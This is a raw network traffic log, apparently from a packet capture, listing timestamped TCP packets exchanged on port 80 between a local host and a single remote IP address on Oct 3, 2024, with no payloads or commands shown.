Oct 3, 2024 18:38:13.875814915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875833988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875847101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875869036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875883102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875904083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875915051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875938892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.875963926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.875972033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876004934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876008987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876028061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876055956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876733065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876766920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876784086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876800060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876815081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876833916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876846075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876868010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876878977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876904964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876914024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876940012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876952887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.876976013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.876995087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.877230883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.878058910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.878094912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.878118038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.878130913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.878142118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.878165960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.878179073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.878204107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.878211975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.878251076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.900492907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.900654078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.900805950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.900821924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.900856018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.900872946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.900971889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.900986910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901000977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901017904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901034117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901043892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901238918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901283979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901316881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901359081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901400089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901415110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901429892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901443005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901456118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901469946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901866913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901882887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901896954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901911974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901913881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901925087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901928902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.901942968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901957989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.901968002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.902940989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.902956963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.902970076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.902976990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.902992010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903007030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903023005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903048038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903784990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903800964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903815985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903830051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903831959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903842926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903845072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903861046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903862000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.903870106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903889894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.903911114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904558897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904575109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904587030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904602051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904604912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904613972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904618025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904633045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904633999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904648066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904649019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904663086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904664993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.904678106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904694080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.904711008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.940308094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940449953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940488100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940593958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.940593958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.940593958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.940915108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940965891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940999031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.940999031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.941015959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.941039085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.941042900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.941087008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.970866919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.970941067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.970973969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971054077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971054077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971054077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971177101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971211910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971237898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971247911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971260071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971295118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971594095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971628904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971656084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971673965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971914053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971946955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971970081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.971980095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.971996069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972018003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972026110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972064018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972549915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972584009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972604036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972630978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972659111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972688913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972712040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972723961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972737074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972759008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972770929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972795010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.972811937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.972846031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973499060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973586082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973609924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973619938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973630905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973654985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973669052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973699093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973728895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973762035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.973783016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.973812103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974065065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974098921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974123955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974132061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974149942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974165916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974179029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974200010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974214077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974236012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974247932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974271059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.974282980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.974315882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975037098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975071907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975092888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975105047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975116968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975138903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975150108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975172043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975182056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975207090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975223064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975246906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.975251913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.975297928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976031065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976066113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976087093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976099968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976114988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976136923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976145983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976170063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976181984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976202965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976213932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976237059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976252079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976273060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976284981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976325989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976882935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976917982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.976938009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976979017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.976990938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977025986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977047920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977061033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977071047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977094889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977107048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977140903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977790117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977824926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977858067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977866888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977866888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977894068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977910042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977926970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977941036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977962017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.977976084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.977996111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978005886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978040934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978548050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978583097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978601933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978616953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978626966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978652000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978662014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978686094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978698015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978719950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978730917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978753090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978773117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978787899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978797913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978821039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.978833914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.978871107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.979351997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.979403973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.979404926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.979439020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.979449034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.979484081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.992834091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.992909908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.992966890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993000984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993025064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993051052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993099928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993153095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993200064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993233919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993252993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993268013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993279934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993299961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993313074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993344069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993561029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993616104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993681908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993716002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993735075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993758917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993918896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993952036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993976116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.993984938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.993994951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994020939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994029999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994066954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994343996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994395971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994398117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994431019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994442940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994465113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994474888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994499922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994509935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994534016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994544983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994569063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.994579077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.994615078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995173931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995206118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995232105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995245934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995249987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995280981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995307922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995326996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995347977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995378971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995399952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995426893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995429993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995462894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.995470047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.995517969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996057987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996090889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996114016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996124983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996136904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:13.996160030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:13.996170998 CEST	49730	80	192.168.2.4	185.215.113.37
